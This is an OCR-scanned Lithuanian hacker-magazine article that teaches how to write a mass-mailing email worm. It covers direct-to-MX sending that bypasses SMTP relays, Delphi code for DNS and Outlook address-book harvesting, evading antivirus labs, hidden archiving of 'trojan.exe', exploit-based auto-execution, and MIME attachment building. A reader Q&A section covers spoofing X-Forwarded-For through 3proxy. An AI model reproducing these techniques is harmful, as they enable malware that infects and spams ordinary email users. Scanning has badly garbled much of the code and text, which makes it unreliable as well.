[Relaying and resolving] Problema Nr.1, kurią mums reikia 
išspręsti — tai kirmino kopijos išsiuntimas turimu pašto adre- 
su. Viename iš ankstesnių mūsų žurnalo numerių aš aptarinė- 
jau pašto siuntimo procesą per tam tikrą nurodytą SMTP serve- 
rį. Toks siuntimo metodas tinka skirtingiems slaptažodžiais ap- 


[Automatinis laiško priedo paleidimas] 
Daugelio pašto kirminų trūkumas — tai, jog norint juos pa- 
leisti būtina įsikišti vartotojui. Tačiau šios saybės galima iš- 
vengti, jeigu išnaudosi elektroninio pašto programinės įran- 
gos pažeidžiamumus. Populiariausias pašto klientas — Out- 
look Expr — html laiškų peržiūros metu naudoja Inter- 
net Explorer varikliuką. Visiems žinoma, jog šis varikliukas 
yra itin skylėtas. IE naršyklei sukurta daugybė eksploitų, ku- 
rie pažeidžiamoje mašinoje paleidžia laisvai pasirinktą ko- 
dą, ir daugeli jų galima panaudoti automatiniam kirmino 
paleidimui atidarant laišką! Už tokią nuostabią galimybę rei- 
kėtų padėkoti Bilui Geitsui, o IE kūrėjams pastatyti pamin- 
klą tai, kad jie šioje naršyklėje paliko daugybę patogių 
išnaudoti skylių :) 
Labai keista, kad šią galimybę išnaudoja labai mažai kirmi- 
nų. Kaip pavyzdį galima paminėti kirminą Winevar. Tai labai 
senas kirminas (sukurtas dar 2002 metais), tačiau jis iš 
daugelio kitų kirminų išsiskiria tuo, jog išnaudoja iFrame 
skylę ir pasileidžia peržiūrint laišką Outlook greitos peržiūros 
lange. Be abejo, tai labai šaunu, tačiau yra ir geresnė gali- 
mybė. Tau tikriausiai teko girdėti apie jpeg 
susijęs su jpeg bylų apdorojimo klaida sisi 
koje. Ši klaida leidžia kompiuterį užkrėsti per bet kokią jpeg 
paveikslėlius rodančią programą! Tai galima išnaudoti ne 
tik su Outlook, bet ir su kitais pašto klientais, pavyzdžiui, 
TheBat arba Eudora. Tiesa, šiuo metu ksploita: 

ką suveikia. 
Be abejo, eksploitai yra labai gerai, tik, deja, ne visada ga- 
lima rasti ką nors realiai veikiančio, todėl vertėtų atkreipti 


dėmesį į kitus kirmino maskavimo laiške metodus. Jeigu su 


laišku išsiųsi exe bylą, tai mažai kas ją paleis, kadangi var- 
totojai tapo atsargesni, tačiau dauguma jų nė neįtaria, kad 
pavojus gali slypėti .hlp ir .chm bylose. Viena iš menkai 
žinomų help bylų galimybių — paprastos kalbos skriptų vyk- 
dymas, o šie skriptai leidžia paleisti vykdomas bylas, Šią 
galimybę galima panaudoti labai efektyviai, kadangi h/p by- 
lomis pasitikima kur kas labiau, nei exe. Help bylas galima 
kurti su Help Workshop (ieina į MS Visual Studio 6 sudėtį). 
Informaciją apie .hip bylose naudojamą skripiinę kalbą ga- 
lima rasti šios programos dokumentacijoje. Siekiant pade- 
monstruoti šio metodo veikimą, mūsų diske rasi help bylą, 
kuri paleidžia cmd.exe. Suprantama, būtų visiškai nesunku 
sukurti tavo diską formatuojančią hip bylą ; 


jau supratai, 


2000 Professional sistemoje (ne 


saugotiems trojanams, bet masiniam kirminų siuntinėjimui jis 
nepanaudojamas. Dėl to reikia turėti vieną ar kelis nuolat vei 
kiančius SMTP serverius, per kuriuos ir keliaus paši Manau 
kad vos tik kirminas bus aptiktas, tokie serveria 
tuojau pat uždraus priėjimą prie jų, 0 Ir šiaip vargu ar koks nors 
STMP serveris sugebės išlaikyti tūkstančių plintančių kirminų 
sukeliamą apkrovimą. Dėl to mums paštą reikia siust aplen- 
kiant centrinį SMTP serverį 

Kas vyksta su laišku, kuris išsiunčiamas per ko 
smtp.mail.lt? Tokiu atveju šis serveris veikia kaip SMTP 
ty. kaip pranešimo perdavimo tarp kliento ir gavėjo SMT 
vėrio tarpininkas. O kam mums siuntinėjimo 
domas elementas, jeigu paštą galima siųsti tiesiogiai gavėjui 
aplenkiant SMTP Relay. Kaip gi mums sužinoti gavėjo STMP 
serverio adresą? Tai labai paprasta! Kokio nors domeno pašta 
priimančio SMTP serverio adresas visada nurodomas atitinka. 
muo: io domeno DNS serverių MX įrašuose. 

Iš pradžių mums reikia nustatyti reikiamo domeno MX 
(resolve). Tai galima atlikti dvejopai 

Pirmasis būdas — parašyti savo DNS Resolver'į, k 
muotų užklausą, siųstų ją serveriui, po to priimtų 
duotų atsakymą. Antrasis panaudoti DNS API. Be abejo, 
pastarasis variantas kur kas paprastesnis, tačiau jis tur 
ną didelį trūkumą — DNS API funkcijos pasirodė tik Windo 
Pro versijose jų nėra!). o 
kadangi pagrindinis pašto kirminais užkrečiamų vartotojų kon- 
tingentas yra prie senų ir neatnaujintų sistemų sėdint 
meriai, tai tokio vardų išsprendimo būdo geriau nenaudoti 
Vis dėlto norėdamas tave supažindinti su DNS API, aš pa 
teiksiu MX įrašus nustatantį kodą: 


andinėje papi 


unclion MXRe: omair: P(har). strin 


pOueryResulisSet: PDNS RECORN 
HostEnt: PHostEn!; 
Name: PChar; 


nil 
DNS TYPE 


Domain UUERY STANDARD, ni Ouetykesult 


Resuli += pūuen Dato.Mi.pName 


GlobalFree(dvword(;OuoyR 


Kaip matai, išspręsti vardus su DNS API paprasčiau nei papras- 
ta, tačiau kadangi šis metodas ne visada priimtinas, sime 
prie kito metodo aptarimo. 


[Rankinis DNS vardų išsprendimas] Aš pabandysiu šiek tiek 
papasakoti apie DNS protokolą. Neturiu tikslo išsamiai papa- 
sakoti apie visą sistemą, tačiau pabandysiu pateikti pagrindi 
nes sąvokas, kurios reikalingos norint suprasti šį protokolą. Iš- 
samiau apie visa tai tu gali sužinoti RFC 1034 ir 1035 doku 
mentuose 

DNS užklausos būna skirtingų tipų. Užklausos tipas nurodomas 


skaičiumi nuo 1 iki 16, taip apibrėžiama pageidaujama gauti 


informacija. Atsakymo tipo numeris visada atitinka užklausos 


2 
[i] 


64) 


[HAKERIS 404 [35] 06 


tipo numerį, kad būtų galima žinoti, kas ir su kuo susijęs. Štai 
pagrindiniai DNS užklausų tipai: 


|] A host address (tinklo mazgo IP adresas) 

02 MS aulhorilotive name server (NS serveris) 

0 MD mail destination (pasenęs tipas, dabar naudojamas MX) 
04 MF mail fowarder (pasenęs tipas, dabar naudojamos MX) 
05 CNAME Wh canonicol name for alias 

06 50A marks cf a start ol zone ol authority 

07 MB (experimental) 

08 MG (experimental) 

09 MR mail rename domain name 

10 NU a null RR 

" WS a well known sewice desaiplian 

12 PR a domain name pointer 

13 KINO host information 

14 MINFO mail bok or mail list information 

15 MX mal exchange 

16 mW 1ex! string 


Iš jų visų mus domina tik MX įrašai, kurių numeris 15. Be už- 
klausos tipo egzistuoja dar ir užklausos klasė. Taip yra dėl to, 
kad DNS protokolas yra universalus ir gali veikti praktiškai bet 
kokiuose tinkluose, t.y. ne tik TCP/IP Kitų tinklų mums nepri- 
reiks, mus domins tik viena užklausų klasė — IN (=1), kuri 
Skirta naudojimui internete. Užklausos paketo formatas yra toks: 


Packet Length -— 2 baitai 

Ouery/Response header 12 baitų 

Ouestion nėra fiksuoto ilgio, priklauso nuo užklausų kiekio 
Ansvar formuoja serveris, nėra fiksuoto ilgio 

Authority — lormuoja serveris, nėra fiksuoto ilgio 

Additional — furmuojo serveris, nėra fiksuoto ilgio 


Užklausoje turi būti Length, Header ir Ouestion, o atsakyme turi 
būti visi laukai, tačiau laukas Answer jame yra būtinas. 

Dabar apibrėšime struktūrą, kuri aprašo Ouery/Response hea- 
der antraštes: 


TDNSHeader — packed racorė 
giylD + word; užklausos identilikotorius. 
options: Ward; — vėliavėlės 


gicount: word: — Ouestion lauko įrašų skaitliukas 
ancounl: WI Answer lauko įrašų skaitliukas 
nscourt: word; — Authority lauko įrašų skaitliukas 
orcourt Ward; — Additional lauko įrošų skaitliukas 
End; 
Tūverylype = packėd record 


KAT 


e astached svar Aaportant Anforaatiėn Kegarding eur ateounĖ, 


Tokie laiškai kasdien pilasi | mano pašto dėžutę. Laimė. Jų priedai yra itruojami 


Olypo : word; — užklausos tipas 
Ollass: verd; — vžklausos klasė 
end; 


Norint gauti SMTP serverio adresą, kuriam mes norime išsiųsti 
laišką, turime sudaryti užklausą, ją išsiųsti, priimti ir dekoduoti 
atsakymą. Manau, jog užklausos struktūra yra aiški, todėl da- 
bar pabandykime pakalbėti apie grąžinamus atsakymus, 0 tam 
reikia išsiaiškinti, kas tai yra RR įrašai. Juos suformuoja NS 
serveris, jie įrašomi tik atsakyme ir griežtai po užklausos lauko, 
ty. Answer ir visa toliau einanti informacija susideda iš tam 
tikro skirtingo formato RR įrašų skaičiaus. Čia perduodami ir IP 
adresai, ir serverių pavadinimai, ir tiesiog tekstinė informacija. 
Išsamiau visi šių įrašų tipai aprašyti RFC 1035 dokumente, jie 
vienas | kitą gana panašūs ir skiriasi tik smulkiomis detalėmis, 
todėl aš pakalbėsiu tik apie mane dominančius. RR santrumpa 
reiškia Resource Record (tai oficialus dokumente pateikiamas 
pavadinimas). RR įrašas atrodo taip: 

NAME up to 255 bylos 
TYPE 2 bytes (UINT) 
CLASS 2 bytes (UINT) 
TIL 4 bytes (signed 32 bits number 
RDLENGTH 2 bytes (UINT) 
RDATA | variable, dapends on guery 
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Čia NAME — įraše aprašomas tinklo mazgo pavadinimas, 
TYPE — pateikiamos informacijos tipas (tipai pateikti aukš- 
čiau), CLASS — tinklo klasė (mūsų atveju ji visada yra "IN" 
(04)), TTL — informacijos saugojimo laikas sekundėmis, 
RDLENGTH -— informacijos bloko ilgis baitais, RDATA pa- 
teikiamos informacijos blokas. 

Dekoduojant atsakymą pagrindinė problema bus grąžinamų tin- 
klo mazgu pavadinimų atrinkimas. Tinklo mazgo pavadinimas su- 
sideda iš kelių dalių. Prieš kiekvieną dalį pateikiamas tos dalies 
ilgi nurodantis baitas. Pavyzdžiui, www.microsoft.com tokiu atve- 
ju atrodys kaip 03 www 09 microsoft 03 com 00, pavadinimas 
visada baigiasi nuliniu baitu. Tačiau pagrindinė savybė tame, kad 
pavadinimas gali būti supakuotas. Pavadinimas supakuojamas 
panaudojant rodyklę, kurios dydis yra du baitai, kur pirmas baitas 
naudojamas kaip semaforas, du vyresnieji šio semaforo bitai yra 
nustatyti į 1, o likę bitai neapibrėžti. Antrasis baitas yra poslinkis 
nuo užklausos pradžios, t.y. nuo pirmojo identifikatoriaus baito. 
Jeigu ilgio baitas lygus $CO, tai kitas už jo einantis baitas bus 
rodyklė (kažkoks košmaras — red. past.). Parašysime tokius pa- 
vadinimus dekoduojančią funkciją: 


function GetūName(var Recvlata; Offsei: Integer; var PI: Pointa:): string; 
var 
ChPi : PChar; 
ReadBytos : Bylė; 
begin 
Resuli += "| 
CP := (0 RoavData; 
Ine(ChPt, Ofset + 1); 
While ChP 7 < > " do 
begin 
it ChPE 7 
begin 


+SC0 then 


IncChPi); 
Result :— Resuli + GetONamo(RecvOata, Ord(ChPt “ ) - I, PI); 
Brenk; 
end else 
bin 
ReodBytės >= Ord(ChPH “ ); 
while RendByles > O do 
begin 
Inc(ChPI); 
Result + Result + sting(ChPt “ ); 
Dec(Readžytes); 
end; 
end; 
IndChPi); 
i (ip < 
end; 
P:= PL 
end; 


>) hen Result := Result + 744 


Kadangi straipsnio apimtis neleidžia išsamiai aptarti MX vardų 
išsprendimo proceso, aš čia aptarsiu tik dar vieną svarbų nNiu- 
ansą — DNS serverio IP adreso gavimą, per kurį mes siųsime 
užklausas. Čia mums padės funkcija GetNetworkParams iš iphl- 
papi.dll. Ši funkcija grąžina įvairią informaciją apie tinklo adap- 
terius, taip pat ir DNS adresus. 


funcion GetDNSServer(): dvord; 
var 
FivadinioSizs : Integer; 
Fixedinto : PFixedlnto; 
PDNS : PIPAddiSiring; 
GstNotworkParams ; function(FI:PFixedlnfo; var Bullen; Integer): Intoger; stdcall, 
begin 
Rest := 0; 
GelNetvorkParams + GetProcAddress(Loadlibrary(iphlpapidl!), "GetNetworkParams'); 
if (ooGeiNetworkParams = nil then Eil; 
FixedlnloSize := 1024; 
Ge:Men|(Fiedlnio, FiedlnfoSize); 


il GetNlotworkParams(Fixedlnlo, FnedlnfoSize) — ERROR SUCCESS then 


begin 
PDNS ;— Go Finodlrto “ „DNSSeveris; 
iP PDNS < > il hen Resul + inch addr(FDNS > IPAddtes); 
ant; 
HresMen(Fredlnio); 
end; 


[Pašto adresų gavimas] Prieš pradedant siuntinėti kirmino kopi- 
Jas neblogai būtų nustatyti adresus, kuriais mes jį siuntinėsime. 
Tam mums iš pradžių reikią iš vartotojo adresų knygutės ištraukti 
visus adresus, 0 po to jų ieškoti visose diske saugomose bylose. 
Iš pradžių pašto adresus pabandysime gauti iš Outlook adresų 
knygutės. Mums reikalinga informacija saugoma .wab bylose, o 
kadangi jų struktūra yra paprasta, mums bus nesunku jas ap- 
doroti rankiniu būdu. Štai kodo pavyzdys, kuris visus wab byloje 
saugomus adresus išsaugoja | bvlą Emails.bt: 


procedure ReadWVAB(WABFile: string); 
var 
E: filė; 


|: duord; 
S; string; 
N: arayjl.5] of Char; 
Buf + anoy[1..500) ot Char; 
R: TexFilė; 
begin 
AssignFile(R,/Emails tx'); 
ReWrite(R); 
AssignFile(F,WHBFile); 
Roser(f,1); 
il 1OResul! 
16poot 
BlockRend(F,2); 
ši NC) + M2]— 26034748 then begin 
BlockRead(F.Bul,Ord(N(2]) + 30); 
S= 
for II to Ord(N[Z)-+ 30 do S: S + Bl; 
DeleelS,13); 
Ir Pos(00/00:600 5); 
if 1-0 then Setlengih(S,-1); 
for =! 40 Ord(N[2]) do if SĮ] 00 then 
Delete(S,1); 
lor I:= 1 to Lengih(S) do 
1VSĮ1)< dy(d5) ten begin 
Stlength(S,!-1); 
Break; 


( Yen begin 


and; 
il (Pos('c62'5) > OJand(Fos(5) 0) hen 
wrileln(1, UpperCose(S)); 
end else Seek[F,FilePos(F)-1); 
uni FileSizs(F)-ilePos(F) 6; 
Closefila(F); 
and; 
(loseFile(R); 
end; 


Windows Messenger adresus išgauti bus visai paprasta, kadan- 
gi jie saugomi sisteminiame registre, HKEY CUR- 
RENT USER|Software|Microsoft|MessengerService|ListCa- 
che|.NET Messenger Service šakoje, iš kur juos galima nuskai- 
tyti tiesiog išvardinant atitinkamus raktus. Manau, tu ir pats 
žinai, kaip tai padaryti. 

Kitas etapas po adresų knygučių bus pašto adresų paieška 
diske saugomose bylose. Tai padaryti labai paprasta. todėl 
pavyzdžių aš nepateikinėsiu, tiesiog pasufleruosiu, jog tam 
tau pakaks šių API funkcijų: FindFirstFile, FindNextFile, Find- 
Close, CreateFile, ReadFile ir CloseHandle. Be abejo, tam 
būtinai reikės ir šiek tiek smegenų (jos pravers norint su- 
prasti, kaip pašto adresų paieškoje įdarbinti reguliariąsias 
išraiškas — red.past.). Be abejo, be viso šito adresus gali- 
ma išgavinėti ir iš kitų programų adresų knygučių, galima 
net panaudoti keyloggerį ir sekti vartotojo įvedamus duo- 
menis. Visi šie metodai padidina kirmino efektyvumą ir jo 
dauginimosi greitį. Labai svarbus niuansas gaunant adresų 
sarašą — jo filtravimas. Tu juk nenori, kad tavo kirminas 
pats iškeliautų tiesiai į antivirusų kūrėjų laboratorijas, todėl 
derėtų sukurti žodžių-išimčių sąrašą, kurie neturėtų būti 
siuntimui tinkamuose adresuose. Visų šių adresų su tokiais 
žodžiais tiesiog nereikėtų įtraukti į bazę. 
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[Laiško priedų kūrimas] Kol kas mes dar nesam aptarę pri- 
segtų bylų siuntimo laiško tekste. Pradėsime nuo to, jog laiš- 
kų priedai siunčiami ne dvejetainiu, o tekstiniu pavidalu. Tai 
susiję su tuo, jog iš pradžių SMTP/POP3 protokolai buvo su- 
kurti išimtinai teksto perdavimui ir dirbo ne su baitais, o su 7 
bitų simboliais, kas leido perdavinėti tik lotynų abėcėlės žen- 
klus. Visi į šį diapazoną nepakliūnantys simboliai būdavo pa- 
što serveryje apipjaustomi iki 7 bitų, dėl ko mes priversti dve- 
jetainius duomenis prieš siuntimą perkoduoti į specialų for- 
matą. Savo laiku buvo prigalvota daugybė kodavimo variantų 
(UUE, XXE, Base64), tačiau prigijo ir dabar sėkmingai naudo- 
Jamas tik Base64 formatas. Pabandykime trumpai aptarti Ba- 
5664 kodavimo principus. 

Kaip žinia, baitą sudaro aštuoni bitai. Vienas baitas gali būti 
256 reikšmių: nuo O iki 255. Tačiau jeigu vietoje aštuonių 
bitų naudojami tik šeši, tai tuomet informacijos kiekis su- 
mažėja iki 64 reikšmių: nuo O iki 63. Dabar svarbiausia: bet 
kokį 6 bitų baito skaičių galima atvaizduoti kaip spausdina- 
mą simbolį. 64 simboliai nėra daug, tačiau ASCII simbolių 
tikrai pakaks, kas mums leidžia visus duomenis užkoduoti 
naudojant šią simbolių aibę: 


ABCDEFGHUKUMNOPORSTUVWXZabcdefghijklmnojrstuvwyz0123456783 + / 


Toliau imami trys iš eilės einantys baitai po aštuonis bitus (viso 
24 bitai) ir padalinami į keturis 6-ių bitų baitus (viso 24 bitai). 
„Šešių bitų baitas“ skamba šiek tiek keistai. Iš tiesų bitų 
yra aštuoni, tačiau naudojami tik 6 jaunesnieji bitai, du vy- 
resnieji bitai yra ignoruojami. Remdamiesi šiuo principu mes 
galime perkoduoti bet kokią dvejetainę informaciją į tekstą, 
tuo pačiu nelabai smarkiai padidindami jo apimtį (3096 pro- 
centų). Po to mūsų informacija per pašto serverį perduoda- 
ma reikiamam adresatui, kurio pašto programa tekstą de- 
koduoja į dvejetainę bylą. Paruoštą Base64 kodavimo pa- 
vyzdį tu rasi mūsų su žurnalu pateikiamame diske. Vis dėlto 
paprastai į laiško tekstą įterpti Base64 kodo nepakanka. 
Tam, kad pašto programa šį tekstą atpažintų kaip laiško 
priedą, reikia suformuoti atitinkamas antraštes. Laiško pra- 
džioje būtinai reikia įterpti MIME-Version 
ir Content-Type antraštes, kur pirmoji 
nurodo MIME versiją (mes naudosime 
1.0), o antroji — siunčiamo laiško tipą 
ir skyriklius tarp MIME elementų. Prieš 
Base64 duomenis turi būti įterptas blo- 
kas, kuris aprašo šių duomenų tipą, laiš- 
ko priede pateikiamos bylos pavadinimą 
ir kodavimo tipą. Tai atrodo maždaug 
taip: 


subject: 
Return-Path: 


Content-TyD 


MUNE-Veision: 1.0 
Conten!-Type: multipart/mixod; bounda- | Content-ID: 
W=" 13023223 i 
===130223>=== 
Content-Type: text/plain; charsel= "windows-1251'; for- 
mat="Ilowed" 


Content-Transfer-Encoding: Bbit ng033) 


T0RAVE 


(Leiško Iakstas] Laiško priedas. 


"T*neus report 
<Nodujal ivdias, a 
X-OriginalArrivalTime: 10 Nov 2005 04:06:01.0397 (UTC) FILETINE+[OFESAESO:01CSESAC] 


(-79C553621906568 

ext/html; 
charset="150-8853-1" 

Content-Transfer-Encoding: gvoted-printabis 


<img sre=3Dcid:4b60-7a7b22££ac26448346147197532> 
54a975b7hc 
Content-Type: image/git: 
names" xki£b.git" 
Content -Transfer-Encodiny: hasetd 
Content-Disposition: 
Zilenamės"xK1ZD. gt" 
<4p80c7a7b2221ac26d483d6147£97932> 


RO1GOD1NEUKAAC TAAAAAAP// //SAAMDAVIChgP/ / / NAAAAAAACHSBALAAAUALAAAAAABACGDAUP+ 
CBGgvu/ ByF xUskr BBnSYEOKKB 1ge 2nKi+HmTRYLmPEXZKGOdy703VOzFBvLpPVuNLhaFSyzoc2pb 
Vaa311mujCvs1y2KPVOUkog+50547HJ7+9m+27uGidp/6K1u1 1LdnpCeYhxNhREW2 xOUBSAeVm I 
VUL) 2m+PeC11425/MDEN12KYXpIMIURSYZAVOSvnPodN4JvSkZF gp 73EkrOahgOgpoHALF13NeeK 
mbZyOVSKecs2NAbVkLh+1 FNgp3 GeFe TvGa/mIy8c4F 1xbS 1VCr 1hdmhuo33 591D68aHus Duk 
EDZZSkTSO1br ji SYBKR4Gp InHbyKuGoFpCb+CgmO Xalio +HF zUO04d1 43 0PPmIRHgI va 7EhA2 JEDH 
eDETYSy42JaocBe+bUg4 i pyOha) 60ApILNKJa= 6nJd2 4 A4A1NUmCVE rGeVLE1U L TENIA +: 19b 
NU EkUNIEmO4VUnIn jb XbU RGeNHCFE 19nYy1 UhvacUP Yp Lv) cNSOLx XE 1nmoO1 SVoFKSgį EO 
PRAVDmOdP YSUnES 7RSLSUVLanALSP! [RhJLOYh2dS65a177 D 


===13023223- 
Content-Type: application/ocet-stream 
Contont- Disposition; atiechment; 
filename = "trojan exe" 
Content-Tronsfer-Encoding: based 


čio yra Bose64 duomenys .. 


Manau, tau aišku, kaip prie laiško prisegti priedą. Kadangi 
visas siunčiamas bylas mes pakuosime į archyvą, reiktų iš- 
siaiškinti, kaip jį galima sukurti. Paprasčiausias ir geriau- 
sias būdas — pasinaudoti išoriniu archyvatoriumi, pavyz- 
džiui, jeigu vartotojo kompiuteryje įdiegtas WinRar, tuomet 
archyvą galima sukurti su viso labo viena eilute: WinE- 
xec('rar.exe a -r data.rar trojan.exe', SW HIDE). Taip gali- 
ma panaudoti ir kitus archyvatorius, tačiau, deja, ne visų 
kompiuteriuose įdiegtas bent Koks nors archyvatorius. To- 
kiu atveju mums nieko nelieka, kaip tik archyvus kurti ranki- 
niu būdu. Vis dėlto aš manau, kad tau nesinori kankintis su 
suspaudimu, todėl mes pasinaudosime MadZip biblioteka, 
kuri leidžia pilnavertiškai dirbti su ZIP archyvais, 0 į vykdo- 
mą bylą prideda tik papildomus 20 Kb. Kaip visada, biblio- 
teką gali rasti kartu su žurnalu pateikiamame diske, ja nau- 
dotis labai paprasta, garbės žodis. 

Taigi čia aš pasistengiau aprašyti kirminų veikimo ir kai kuriuos 
jų realizacijos principus. Be abejo, čia pateiktos Informacijos 
nepakanka tam, kad sukeltų naują epidemiją, tačiau visko, ko 
tam reikia, tu gali išmokti pats (tik jokiu būdu to nedaryk — tai 
labai blogai!). Iš pradžių siūlyčiau internete susirasti Beagle ir 
MyDoom išeities tekstus ir atidžiai juos išstudijuoti, po to per- 
skaityti ir suprasti SMTP ir MIME protokolus aprašančius RFC 
dokumentus. Taip pat reikia šiek tiek išmanyti psichologiją. kad 
priverstum daugelį vartotojų paleisti prie laiško prisegtą bylą. 
Be to, gana neblogai būtų kirminui pridėti kokį nors polimorfą. 
Vis dėito aš tikiuosi, kad naujos epidemijos nebus, kadangį kiek- 
vienas, kuris pilnai suvokia mūsų aptariamą temą, nepradės 
savo žinių eikvoti beprasmiam naikinimui, geriau jas panaudoti 
visiems naudingos programinės įrangos kūrimui. Sėkmės! 


79-552621906568 
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PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RIŠKŲ KLAUSIMŲ, ATSAKYMUS Į 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


Noriu paeksperimentuoti su egzotiškomis failų sis- 
temomis, tokiomis, kaip ReiserFS ir JFS. Kuris iš 
Linux'ų su jomis dirba? 


Tiesą sakant, daugelis. Pavyzdžiui, eksperimentams 
puikiai tiks Fedora Core 4. Pagal nutylėjimą šios failų 
sistemos nėra naudojamos, tačiau niekas netrukdo sa- 

varankiškai aktyvuoti jų galimybę. Įdiegimo metu tau 
reikia pereiti į komandinę eilutę ir, norint aktyvuoti ReiserFS, 
joje įvesti: 


inux selinux = O teises 
JFS atveju komanda būtų tokia: 
ux selinux=0 js 
Jeigu ketini pasinaudoti XFS failų sistema, tiesiog surink: 
ux XS 
Pastebėsiu, jog visos trys šios sistemos yra žurnalizuojan- 
čios. Būdingas tokių failų sistemų bruožas yra specialus 
įvykių žurnalas, kuriame surašomas bylose atliktų pakeiti- 
mų sąrašas. Toks metodas leidžia efektyviai išsaugoti failų 


sistemos vientisumą, net jeigu netikėtai dingsta maitini- 
mas arba įvyksta koks nors aparatinis sutrikimas. 


Kaip žinia, skaidrūs proxy serveriai išduoda realų 

vartotojo IP adresą per HTTP antraštę X-Forwar- 

ded-For. Taigi klausimas: ar yra tokių proxy serve- 
rių, kurie leistų perdavinėti suklastotą X-Forwarded- 
For? Būtų šaunu čia įrašyti pentagono adresą ir lan- 
džioti po visą internetą. Tegu ieško :). 


Pasirodo, surasti tokią funkciją palaikantį proxy serverį 
ne taip paprasta. Vienintelis tai sugebantis yra 


3JAPA3A]tiny proxy (3proxy). Serveris konfigūruojamas 
tekstinėje byloje, kuri pačiu paprasčiausiu atveju gali 
atrodyti maždaug taip: 


senai 1270.0.] 
aulh none 

allow * 

prosy —p8080 
intema! 12700. 
log /dev/nul 


Anonimiškumo lygis parodomas paleidimo metu. Galima 
naudoti du raktus: a, kuris parodo, kad proxy bus anoni 

miškas, ir -a1, kuris priverčia serverį vietoje X-Forwarded 

For perdavinėti atsitiktines IP adresų reikšmes. Deja, taip 
imti ir čia nurodyti konkretaus IP adreso negalima, tačiau 
niekas nesako, kad tai iš esmės neįmanoma. Kaip žinia, 
3ĮAPA3A|tiny proxy (3proxy) platinamas su išeities tekstais, 
todėl tu kuo puikiausiai gali programą pritaikyti savo reik- 
mėms. Pasakysiu dar daugiau: Už X-Forwarded-For ant 

raštę atsakantis kodo fragmentas yra byloje proxy.c. Čia vis- 
kas priklauso nuo tavo fantazijos: galima realizuoti IP gene- 
ravimą pagal kokį nors algoritmą, IP adresą atsitiktinai pa. 
rinkti iš nurodyto diapazono (pavyzdžiui, kuris susijęs su ko 
kiu nors dial-up tiekėju), IP adresus importuoti iš atskiros 
konfigūracinės bylos ir t.t. Tik atmink, jog daugelis servisų, 
nustatę, jog tu naudoji proxy serverį, tiesiog atsisakys tave 
aptamauti ir tiesiai šviesiai paprašys jį atjungti, jeigu tu nori 
atlikti kokį nors veiksmą, pavyzdžiui, pervesti pinigus. 
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